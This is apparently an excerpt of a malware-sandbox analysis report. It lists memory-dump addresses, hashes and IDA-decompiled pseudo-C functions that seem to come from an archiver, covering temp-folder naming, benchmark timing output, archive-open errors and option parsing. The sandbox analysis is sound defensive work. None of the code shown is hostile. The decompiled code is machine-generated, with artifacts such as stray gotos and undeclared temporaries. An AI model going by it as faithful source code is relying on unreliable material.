                                                                                                    0x003f89c6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f89c8
                                                                                                    0x003f89cb
                                                                                                    0x003f89cc
                                                                                                    0x003f89cc
                                                                                                    0x003f89d4
                                                                                                    0x00000000
                                                                                                    0x003f89d4
                                                                                                    0x003f8974
                                                                                                    0x003f8977
                                                                                                    0x003f897e
                                                                                                    0x003f8986
                                                                                                    0x003f8986
                                                                                                    0x00000000
                                                                                                    0x003f897e
                                                                                                    0x003f8887
                                                                                                    0x003f888a
                                                                                                    0x003f8891
                                                                                                    0x003f8899
                                                                                                    0x003f889e
                                                                                                    0x003f88a1
                                                                                                    0x003f88a4
                                                                                                    0x003f88a6
                                                                                                    0x003f88ae
                                                                                                    0x003f88b5
                                                                                                    0x003f88b8
                                                                                                    0x003f88bb
                                                                                                    0x003f88bf
                                                                                                    0x003f88c9
                                                                                                    0x003f88cd
                                                                                                    0x003f88d0
                                                                                                    0x003f88d3
                                                                                                    0x003f88d5
                                                                                                    0x003f88e2
                                                                                                    0x003f88e2
                                                                                                    0x003f88e4
                                                                                                    0x003f88e6
                                                                                                    0x003f88f3
                                                                                                    0x003f88f3
                                                                                                    0x003f88f5
                                                                                                    0x003f88f8
                                                                                                    0x003f8900
                                                                                                    0x003f8900
                                                                                                    0x003f8905
                                                                                                    0x003f8905
                                                                                                    0x003f88a6
                                                                                                    0x00000000
                                                                                                    0x003f8891
                                                                                                    0x003f886e
                                                                                                    0x003f8872
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003f87f2
                                                                                                    0x003f87f7
                                                                                                    0x003f87fc
                                                                                                    0x003f8802
                                                                                                    0x003f8804
                                                                                                    0x003f8807
                                                                                                    0x003f8810
                                                                                                    0x003f8813
                                                                                                    0x003f8819
                                                                                                    0x003f881c
                                                                                                    0x003f881f
                                                                                                    0x00000000
                                                                                                    0x003f8821
                                                                                                    0x003f8821
                                                                                                    0x00000000
                                                                                                    0x003f8821
                                                                                                    0x003f881f
                                                                                                    0x003f8b51
                                                                                                    0x003f8b55
                                                                                                    0x003f8b57
                                                                                                    0x003f8b5a
                                                                                                    0x003f8b5c
                                                                                                    0x003f8b5d
                                                                                                    0x003f8b65
                                                                                                    0x003f8b66
                                                                                                    0x003f8b6e
                                                                                                    0x003f8b6f
                                                                                                    0x003f8b77
                                                                                                    0x003f8b77
                                                                                                    0x003f8b78
                                                                                                    0x003f8b78
                                                                                                    0x003f8b5a
                                                                                                    0x00000000
                                                                                                    0x003f8775
                                                                                                    0x003f8775
                                                                                                    0x003f8b91
                                                                                                    0x003f8b95
                                                                                                    0x003f8b9d
                                                                                                    0x003f8b9d

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: H_prolog
                                                                                                    • String ID: $ $.$:mem$Delta$LZMA$LZMA2$o
                                                                                                    • API String ID: 3519838083-3806607069
                                                                                                    • Opcode ID: 062f877fca2e894275c9a593aecbdeaf8227ec5fc37d91e413ea68385ff8143a
                                                                                                    • Instruction ID: f0d3e1d39aa81c6ec1c0afe702488fbac3e555a546f8ef03970a6fbd56ee0add
                                                                                                    • Opcode Fuzzy Hash: 062f877fca2e894275c9a593aecbdeaf8227ec5fc37d91e413ea68385ff8143a
                                                                                                    • Instruction Fuzzy Hash: 64D1F231E0426E8BCF1BCFA8C8946FEBBB2BF05304F25456ADA55AB241CBB05D05CB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003B61DE Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 116threadCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 100%
                                                                                                    			E003B61DE(intOrPtr __ecx, void* __edx) {
				signed int _t37;
				signed int _t38;
				signed int _t39;
				signed char _t44;
				void* _t46;
				signed int _t52;
				signed char _t53;
				void* _t58;
				void* _t61;
				signed char* _t64;
				unsigned int _t78;
				signed char** _t80;
				unsigned int _t87;
				void* _t89;

				E0041F1B0(E00422ECC, _t89);
				_t61 = __edx;
				 *((intOrPtr*)(_t89 - 0x14)) = __ecx;
				_t37 = GetCurrentThreadId();
				_t38 = GetTickCount();
				_t39 = GetCurrentProcessId();
				_t80 =  *(_t89 + 8);
				_t87 = (_t37 << 0x00000002 ^ _t38) << 0x0000000c ^ _t39;
				 *(_t89 - 0x10) =  *(_t89 - 0x10) & 0x00000000;
				do {
					_t64 = 0;
					_t80[1] = 0;
					 *( *_t80) =  *( *_t80) & 0;
					if(_t61 != 0) {
						_t78 = _t87;
						do {
							_t52 = _t78 & 0x0000000f;
							_t78 = _t78 >> 4;
							if(_t52 >= 0xa) {
								_t53 = _t52 + 0x37;
								__eflags = _t53;
							} else {
								_t53 = _t52 + 0x30;
							}
							 *(_t89 + _t64 - 0x30) = _t53;
							_t64 = _t64 + 1;
						} while (_t64 < 8);
						 *(_t89 + _t64 - 0x30) =  *(_t89 + _t64 - 0x30) & 0x00000000;
						if( *(_t89 + 0xc) != 0) {
							E003B283C();
						}
						E003B284C(_t80, _t89 - 0x30);
						_t58 = GetTickCount() + 2;
						if(_t58 == 0) {
							_t58 = 1;
						}
						_t87 = _t87 + _t58;
					}
					_t101 =  *(_t89 + 0xc);
					_t61 = 1;
					if( *(_t89 + 0xc) != 0) {
						E003B284C(_t80, ".tmp");
					}
					E003B2D8A(_t89 - 0x20,  *((intOrPtr*)(_t89 - 0x14)));
					 *(_t89 - 4) =  *(_t89 - 4) & 0x00000000;
					E003B3164(_t89 - 0x20,  *_t80);
					if(E003B7034( *((intOrPtr*)(_t89 - 0x20)), _t101) == 0) {
						__eflags =  *(_t89 + 0xc);
						if( *(_t89 + 0xc) == 0) {
							_t44 = L003B5A50( *((intOrPtr*)(_t89 - 0x20)));
						} else {
							_t44 = L003B78FA( *((intOrPtr*)(_t89 - 0x20)), 0);
						}
						__eflags = _t44;
						if(_t44 != 0) {
							E003B1E40(_t44,  *((intOrPtr*)(_t89 - 0x20)));
							_t46 = 1;
						} else {
							_t43 = GetLastError();
							__eflags = _t43 - 0x50;
							if(_t43 == 0x50) {
								goto L22;
							} else {
								__eflags = _t43 - 0xb7;
								if(_t43 != 0xb7) {
									E003B1E40(_t43,  *((intOrPtr*)(_t89 - 0x20)));
									L26:
									_t80[1] = _t80[1] & 0x00000000;
									 *( *_t80) =  *( *_t80) & 0x00000000;
									_t46 = 0;
								} else {
									goto L22;
								}
							}
						}
					} else {
						SetLastError(0xb7);
						goto L22;
					}
					 *[fs:0x0] =  *((intOrPtr*)(_t89 - 0xc));
					return _t46;
					L22:
					 *(_t89 - 4) =  *(_t89 - 4) | 0xffffffff;
					E003B1E40(_t43,  *((intOrPtr*)(_t89 - 0x20)));
					 *(_t89 - 0x10) =  *(_t89 - 0x10) + 1;
				} while ( *(_t89 - 0x10) < 0x64);
				goto L26;
			}

















                                                                                                    0x003b61e3
                                                                                                    0x003b61ee
                                                                                                    0x003b61f0
                                                                                                    0x003b61f3
                                                                                                    0x003b61fe
                                                                                                    0x003b6209
                                                                                                    0x003b620f
                                                                                                    0x003b6212
                                                                                                    0x003b6214
                                                                                                    0x003b6218
                                                                                                    0x003b621a
                                                                                                    0x003b621c
                                                                                                    0x003b621f
                                                                                                    0x003b6223
                                                                                                    0x003b6225
                                                                                                    0x003b6227
                                                                                                    0x003b6229
                                                                                                    0x003b622c
                                                                                                    0x003b6232
                                                                                                    0x003b6239
                                                                                                    0x003b6239
                                                                                                    0x003b6234
                                                                                                    0x003b6234
                                                                                                    0x003b6234
                                                                                                    0x003b623c
                                                                                                    0x003b6240
                                                                                                    0x003b6241
                                                                                                    0x003b6246
                                                                                                    0x003b624f
                                                                                                    0x003b6253
                                                                                                    0x003b6253
                                                                                                    0x003b625e
                                                                                                    0x003b626a
                                                                                                    0x003b626b
                                                                                                    0x003b626f
                                                                                                    0x003b626f
                                                                                                    0x003b6270
                                                                                                    0x003b6270
                                                                                                    0x003b6272
                                                                                                    0x003b6276
                                                                                                    0x003b6278
                                                                                                    0x003b6281
                                                                                                    0x003b6281
                                                                                                    0x003b628c
                                                                                                    0x003b6293
                                                                                                    0x003b629a
                                                                                                    0x003b62a9
                                                                                                    0x003b62bb
                                                                                                    0x003b62bd
                                                                                                    0x003b62ce
                                                                                                    0x003b62bf
                                                                                                    0x003b62c4
                                                                                                    0x003b62c4
                                                                                                    0x003b62d3
                                                                                                    0x003b62d5
                                                                                                    0x003b6308
                                                                                                    0x003b630e
                                                                                                    0x003b62d7
                                                                                                    0x003b62d7
                                                                                                    0x003b62dd
                                                                                                    0x003b62e0
                                                                                                    0x00000000
                                                                                                    0x003b62e2
                                                                                                    0x003b62e2
                                                                                                    0x003b62e7
                                                                                                    0x003b6315
                                                                                                    0x003b631b
                                                                                                    0x003b631d
                                                                                                    0x003b6321
                                                                                                    0x003b6324
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003b62e7
                                                                                                    0x003b62e0
                                                                                                    0x003b62ab
                                                                                                    0x003b62b0
                                                                                                    0x00000000
                                                                                                    0x003b62b0
                                                                                                    0x003b632c
                                                                                                    0x003b6334
                                                                                                    0x003b62e9
                                                                                                    0x003b62ec
                                                                                                    0x003b62f0
                                                                                                    0x003b62f5
                                                                                                    0x003b62f9
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • __EH_prolog.LIBCMT ref: 003B61E3
                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003B61F3
                                                                                                    • GetTickCount.KERNEL32 ref: 003B61FE
                                                                                                    • GetCurrentProcessId.KERNEL32(?,?,00000000), ref: 003B6209
                                                                                                    • GetTickCount.KERNEL32 ref: 003B6263
                                                                                                    • SetLastError.KERNEL32(000000B7,?,?,?,?,00000000), ref: 003B62B0
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 003B62D7
                                                                                                      • Part of subcall function 003B5A50: __EH_prolog.LIBCMT ref: 003B5A55
                                                                                                      • Part of subcall function 003B5A50: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000001,?,?,00000000), ref: 003B5A77
                                                                                                      • Part of subcall function 003B1E40: free.MSVCRT(?,003D6B41,00000000,00000000,00000001,?,003B10EB), ref: 003B1E44
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountCurrentErrorH_prologLastTick$CreateDirectoryProcessThreadfree
                                                                                                    • String ID: .tmp$d
                                                                                                    • API String ID: 1989517917-2797371523
                                                                                                    • Opcode ID: 21c919cba8f54bb84d7fa2b3da099b45857b6cf0e8932b93454da78f531e7a91
                                                                                                    • Instruction ID: 96a1cae18949337bc37f11a5ba3f56a599cb3603de9634778fe5078e598f2468
                                                                                                    • Opcode Fuzzy Hash: 21c919cba8f54bb84d7fa2b3da099b45857b6cf0e8932b93454da78f531e7a91
                                                                                                    • Instruction Fuzzy Hash: AD412332A14128DBEF16ABA0D8477EDB770FF45318F100629E606AE9A2CB3C8C01CB14
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EAA30 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 114COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 94%
                                                                                                    			E003EAA30(void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				intOrPtr _v8;
				void* __ecx;
				struct _IO_FILE** _t34;
				struct _IO_FILE** _t42;
				struct _IO_FILE** _t45;
				signed int _t52;
				char* _t56;
				void* _t58;
				void* _t61;
				void* _t64;
				void* _t67;
				void* _t68;
				void* _t69;
				signed int _t73;
				intOrPtr _t75;
				struct _IO_FILE** _t81;
				intOrPtr _t86;
				void* _t90;
				void* _t91;
				void* _t93;

				_t90 = __eflags;
				_t69 = __edx;
				_push(_t56);
				_push(_t56);
				_t81 =  *0x43a894; // 0x43a5b0
				E003B1FA0(_t81);
				fputs(_t56,  *_t81);
				fputs(" Time =",  *_t81);
				_t82 = E0041F380(_a4, _a8, 0x989680, 0);
				_t58 = 6;
				E003EA9E0(_t58, 0x20, _t90, _t31, _t69);
				_t34 =  *0x43a894; // 0x43a5b0
				fputc(0x2e,  *_t34);
				_t73 = 0x30;
				_t61 = 3;
				E003EA9E0(_t61, 0x30, _t90, (_a4 - _t82 * 0x989680) / 0x2710, 0);
				_t91 = _a8 - 0x1000000;
				if(_t91 >= 0) {
					if(_t91 > 0) {
						L3:
						_t75 = _a8;
						_t67 = 1;
						_a4 = E0041F470(_a4, _t67, _t75);
						_a8 = _t75;
						_t73 = _a16;
						_t68 = 1;
						_t52 = E0041F470(_a12, _t68, _t73);
						_t93 = _a8 - 0x1000000;
						_a12 = _t52;
						_a16 = _t73;
					} else {
						L2:
						if(_a4 > 0) {
							do {
								goto L3;
							} while (_t93 > 0);
							if(_t93 >= 0) {
								goto L2;
							}
						}
					}
				}
				_t86 = 0;
				_t94 = _a12 | _a16;
				_v8 = 0;
				if((_a12 | _a16) != 0) {
					_t86 = E0041F380(E0041F4B0(_a4, _a8, 0x64, 0), _t73, _a12, _a16);
					_v8 = _t73;
				}
				_t42 =  *0x43a894; // 0x43a5b0
				fputs(" =",  *_t42);
				_t64 = 5;
				E003EA9E0(_t64, 0x20, _t94, _t86, _v8);
				_t45 =  *0x43a894; // 0x43a5b0
				return fputc(0x25,  *_t45);
			}























                                                                                                    0x003eaa30
                                                                                                    0x003eaa30
                                                                                                    0x003eaa33
                                                                                                    0x003eaa34
                                                                                                    0x003eaa37
                                                                                                    0x003eaa42
                                                                                                    0x003eaa50
                                                                                                    0x003eaa59
                                                                                                    0x003eaa70
                                                                                                    0x003eaa78
                                                                                                    0x003eaa7b
                                                                                                    0x003eaa80
                                                                                                    0x003eaa8f
                                                                                                    0x003eaaa6
                                                                                                    0x003eaaab
                                                                                                    0x003eaaaf
                                                                                                    0x003eaab9
                                                                                                    0x003eaabc
                                                                                                    0x003eaabe
                                                                                                    0x003eaac6
                                                                                                    0x003eaac9
                                                                                                    0x003eaace
                                                                                                    0x003eaad4
                                                                                                    0x003eaadc
                                                                                                    0x003eaadf
                                                                                                    0x003eaae2
                                                                                                    0x003eaae3
                                                                                                    0x003eaae8
                                                                                                    0x003eaaeb
                                                                                                    0x003eaaee
                                                                                                    0x003eaac0
                                                                                                    0x003eaac0
                                                                                                    0x003eaac4
                                                                                                    0x003eaac6
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003eaaf3
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x003eaaf3
                                                                                                    0x003eaac4
                                                                                                    0x003eaabe
                                                                                                    0x003eaaf8
                                                                                                    0x003eaafa
                                                                                                    0x003eaafd
                                                                                                    0x003eab00
                                                                                                    0x003eab1d
                                                                                                    0x003eab1f
                                                                                                    0x003eab1f
                                                                                                    0x003eab22
                                                                                                    0x003eab2e
                                                                                                    0x003eab36
                                                                                                    0x003eab3b
                                                                                                    0x003eab40
                                                                                                    0x003eab51

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$fputc$__aulldiv
                                                                                                    • String ID: Time =$Kernel
                                                                                                    • API String ID: 3602660170-1750218609
                                                                                                    • Opcode ID: e80e7e5ee77e4a3549a9ba1b01af0ba26e3218d11b176e64e09dec77ced17834
                                                                                                    • Instruction ID: 28fa24c36848c7a0dc220a3a473958862d162062babc7c91e855ef65a8dca59b
                                                                                                    • Opcode Fuzzy Hash: e80e7e5ee77e4a3549a9ba1b01af0ba26e3218d11b176e64e09dec77ced17834
                                                                                                    • Instruction Fuzzy Hash: B9311232600218BFEB16EF59DC02F9E37A5EF48710F15812AF9089B2D0C7B5AD50CB99
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003EAB54 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 63COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 76%
                                                                                                    			E003EAB54(char* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* _t17;
				struct _IO_FILE** _t19;
				int _t22;
				void* _t23;
				struct _IO_FILE** _t24;
				char* _t26;
				void* _t29;
				void* _t30;
				intOrPtr _t39;
				struct _IO_FILE** _t42;
				intOrPtr _t43;
				void* _t48;
				void* _t54;

				_t54 = __eflags;
				E0041F1B0(E00426740, _t48);
				_t42 =  *0x43a894; // 0x43a5b0
				_t26 = __ecx;
				fputs("    ",  *_t42);
				fputs(_t26,  *_t42);
				fputs(" Memory =",  *_t42);
				_t39 =  *((intOrPtr*)(_t48 + 0xc));
				_t43 = 0;
				asm("adc edx, edi");
				_t29 = 0x14;
				_t17 = E0041F470( *((intOrPtr*)(_t48 + 8)) + 0xfffff, _t29, _t39);
				_push(_t39);
				_push(_t17);
				_t30 = 7;
				E003EA9E0(_t30, 0x20, _t54);
				_t19 =  *0x43a894; // 0x43a5b0
				fputs(" MB",  *_t19);
				E003B2690(_t48 - 0x18);
				 *((intOrPtr*)(_t48 - 4)) = _t43;
				_t22 = L003C9EF4(_t26, _t48 - 0x18, 0x20, _t43);
				if( *((intOrPtr*)(_t48 - 0x14)) != _t43) {
					_t24 =  *0x43a894; // 0x43a5b0
					_t22 = fputs( *(_t48 - 0x18),  *_t24);
				}
				_t23 = E003B1E40(_t22,  *(_t48 - 0x18));
				 *[fs:0x0] =  *((intOrPtr*)(_t48 - 0xc));
				return _t23;
			}


















                                                                                                    0x003eab54
                                                                                                    0x003eab59
                                                                                                    0x003eab6a
                                                                                                    0x003eab70
                                                                                                    0x003eab79
                                                                                                    0x003eab7e
                                                                                                    0x003eab87
                                                                                                    0x003eab8c
                                                                                                    0x003eab99
                                                                                                    0x003eab9c
                                                                                                    0x003eab9e
                                                                                                    0x003eab9f
                                                                                                    0x003eaba4
                                                                                                    0x003eaba5
                                                                                                    0x003eabaa
                                                                                                    0x003eabab
                                                                                                    0x003eabb0
                                                                                                    0x003eabbc
                                                                                                    0x003eabc3
                                                                                                    0x003eabcb
                                                                                                    0x003eabce
                                                                                                    0x003eabd6
                                                                                                    0x003eabd8
                                                                                                    0x003eabe2
                                                                                                    0x003eabe5
                                                                                                    0x003eabe9
                                                                                                    0x003eabf5
                                                                                                    0x003eabfd

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs$H_prolog
                                                                                                    • String ID: $ MB$ Memory =
                                                                                                    • API String ID: 2614055831-2616823926
                                                                                                    • Opcode ID: 1512b948855a948dec3bc58a994fc1a19c772b8de6c5bb7fc8c04c75b14c6364
                                                                                                    • Instruction ID: a970ec141374c322d627c2fe08ac96daeb51225fa45aeb6dc79f738c69f577dc
                                                                                                    • Opcode Fuzzy Hash: 1512b948855a948dec3bc58a994fc1a19c772b8de6c5bb7fc8c04c75b14c6364
                                                                                                    • Instruction Fuzzy Hash: B911E732A00115AFD706EB95EC83EAEBB75EF84314F20402BF504961D1DB796851CB55
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003E73C6 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 90%
                                                                                                    			E003E73C6(struct _IO_FILE** __ecx, intOrPtr* __edx, char _a4) {
				void* __ebp;
				intOrPtr* _t14;
				struct _IO_FILE** _t15;
				char* _t18;

				_t14 = __edx;
				_t21 = _a4;
				_t15 = __ecx;
				_t18 = "WARNING";
				if(_a4 == 0) {
					_t18 = 0x42bbbc;
				}
				fputs("Open ",  *_t15);
				fputs(_t18,  *_t15);
				fputs(": Cannot open the file as [",  *_t15);
				_push( *_t14);
				_t16 = L003B1FB3(_t15, _t21);
				fputs("] archive",  *_t5);
				return E003B1FA0(_t16);
			}







                                                                                                    0x003e73c6
                                                                                                    0x003e73c6
                                                                                                    0x003e73cf
                                                                                                    0x003e73d1
                                                                                                    0x003e73d6
                                                                                                    0x003e73d8
                                                                                                    0x003e73d8
                                                                                                    0x003e73ec
                                                                                                    0x003e73f1
                                                                                                    0x003e73fa
                                                                                                    0x003e7401
                                                                                                    0x003e7407
                                                                                                    0x003e7410
                                                                                                    0x003e741f

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000B.00000002.818748800.00000000003B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 003B0000, based on PE: true
                                                                                                    • Associated: 0000000B.00000002.818711426.00000000003B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819217768.0000000000429000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819297153.000000000043A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                    • Associated: 0000000B.00000002.819348357.0000000000442000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_11_2_3b0000_7g.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: fputs
                                                                                                    • String ID: : Cannot open the file as [$ERROR$Open $WARNING$] archive
                                                                                                    • API String ID: 1795875747-657955069
                                                                                                    • Opcode ID: 9a003d0e7ce690ba7b787922ee2780a35ef1184b969c953f11bf459028d4e387
                                                                                                    • Instruction ID: bc95ab8c59c6c182e1afde45d3250885b255f9cf91b321db904abf412e70f1a8
                                                                                                    • Opcode Fuzzy Hash: 9a003d0e7ce690ba7b787922ee2780a35ef1184b969c953f11bf459028d4e387
                                                                                                    • Instruction Fuzzy Hash: 77F08231B041286BC61166557C85E2FBF5ADF857A1BA50027FA0447281EB691C20DFA9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 003FA621 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 151COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 92%
                                                                                                    			E003FA621(void* __ecx) {
				intOrPtr _t50;
				intOrPtr _t51;
				intOrPtr _t52;
				intOrPtr _t53;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr _t83;
				void* _t98;
				intOrPtr _t104;
				intOrPtr _t107;
				intOrPtr _t109;
				void* _t110;

				E0041F1B0(0x42782c, _t110);
				_t106 = __ecx;
				E003B2D8A(_t110 - 0x1c,  *((intOrPtr*)(_t110 + 8)));
				 *((intOrPtr*)(_t110 - 4)) = 0;
				_t46 = E003B2285( *((intOrPtr*)(_t110 - 0x1c)));
				if( *((intOrPtr*)(_t110 - 0x18)) == 0) {
					L5:
					_t107 = 0x80070057;
					L37:
					E003B1E40(_t46,  *((intOrPtr*)(_t110 - 0x1c)));
					 *[fs:0x0] =  *((intOrPtr*)(_t110 - 0xc));
					return _t107;
				}
				if( *((short*)( *((intOrPtr*)(_t110 - 0x1c)))) != 0x73) {
					_t50 = E003BCFBA(_t110 - 0x1c, _t110 - 0x10);
					_t104 =  *((intOrPtr*)(_t110 + 0xc));
					__eflags = _t50;
					if(_t50 != 0) {
						L35:
						_push(_t104);
						_push( *((intOrPtr*)(_t110 - 0x1c)));
						_t46 = E003EF675(_t106);
						L36:
						_t107 = _t46;
						goto L37;
					}
					_t51 = E003B23AC( *((intOrPtr*)(_t110 - 0x1c)), "rsfx");
					__eflags = _t51;
					if(_t51 == 0) {
						_t52 = E003B23AC( *((intOrPtr*)(_t110 - 0x1c)), "hc");
						__eflags = _t52;
						if(_t52 == 0) {
							_t53 = E003B23AC( *((intOrPtr*)(_t110 - 0x1c)), "hcf");
							__eflags = _t53;
							if(_t53 == 0) {
								_t54 = E003B23AC( *((intOrPtr*)(_t110 - 0x1c)), "he");
								__eflags = _t54;
								if(_t54 == 0) {
									_push(_t110 + 0xf);
									_push(_t104);
									_push(_t110 - 0x1c);
									_t46 = L003EF85D(_t106 + 0x80);
									__eflags = _t46;
									if(_t46 != 0) {
										goto L36;
									}
									__eflags =  *((intOrPtr*)(_t110 + 0xf));
									if( *((intOrPtr*)(_t110 + 0xf)) == 0) {
										__eflags = E003B23AC( *((intOrPtr*)(_t110 - 0x1c)), "tr");
										if(__eflags == 0) {
											_t58 = E003B23AC( *((intOrPtr*)(_t110 - 0x1c)), "mtf");
											__eflags = _t58;
											if(_t58 == 0) {
												_t59 = E003B23AC( *((intOrPtr*)(_t110 - 0x1c)), "qs");
												__eflags = _t59;
												if(_t59 == 0) {
													goto L35;
												}
												_t98 = _t106 + 0x7a;
												L34:
												_t83 = _t104;
												L11:
												_t46 = E003BCF7A(_t83, _t98);
												goto L36;
											}
											_t98 = _t106 + 0x8e;
											goto L34;
										}
										_t46 = L003EF92D(_t106 + 0x8c, __eflags);
										goto L36;
									}
									_t109 =  *((intOrPtr*)(_t106 + 0x88));
									__eflags = _t109 - 0xffffffff;
									if(_t109 == 0xffffffff) {
										L20:
										_t107 = 0;
										goto L37;
									}
									__eflags = _t109;
									if(_t109 == 0) {
										goto L20;
									}
									__eflags = _t109 - 3;
									if(_t109 == 3) {
										goto L20;
									}
									__eflags = _t109 - 0x17;
									if(_t109 == 0x17) {
										goto L20;
									}
									goto L5;
								}
								_t46 = E003BCF7A( *((intOrPtr*)(_t110 + 0xc)), _t106 + 0x7d);
								__eflags = _t46;
								if(_t46 != 0) {
									goto L36;
								}
								 *((char*)(_t106 + 0x7c)) = 1;
								goto L20;
							}
							 *(_t110 + 0xb) = 1;
							_t46 = E003BCF7A( *((intOrPtr*)(_t110 + 0xc)), _t110 + 0xb);
							__eflags = _t46;
							if(_t46 == 0) {
								asm("sbb eax, eax");
								_t46 = ( ~( *(_t110 + 0xb)) & 0x7ff8ffa9) + 0x80070057;
							}
							goto L36;
						}
						_t98 = _t106 + 0x7b;
						L10:
						_t83 =  *((intOrPtr*)(_t110 + 0xc));
						goto L11;
					}
					_t98 = _t106 + 0x8f;
					goto L10;
				}
				E003B34A6(_t110 - 0x1c, 0);
				if( *((intOrPtr*)(_t110 - 0x18)) != 0) {
					_t46 =  *((intOrPtr*)(_t110 + 0xc));
					__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t110 + 0xc))));
					if(__eflags == 0) {
						_t46 = E003FA468(__ecx, __eflags, _t110 - 0x1c);
						goto L36;
					}
					goto L5;
				}
				_push( *((intOrPtr*)(_t110 + 0xc)));
				_t46 = E003FA574(__ecx);
				goto L36;
			}
















                                                                                                    0x003fa626
                                                                                                    0x003fa631
                                                                                                    0x003fa639
                                                                                                    0x003fa643
                                                                                                    0x003fa646
                                                                                                    0x003fa64e
                                                                                                    0x003fa67e
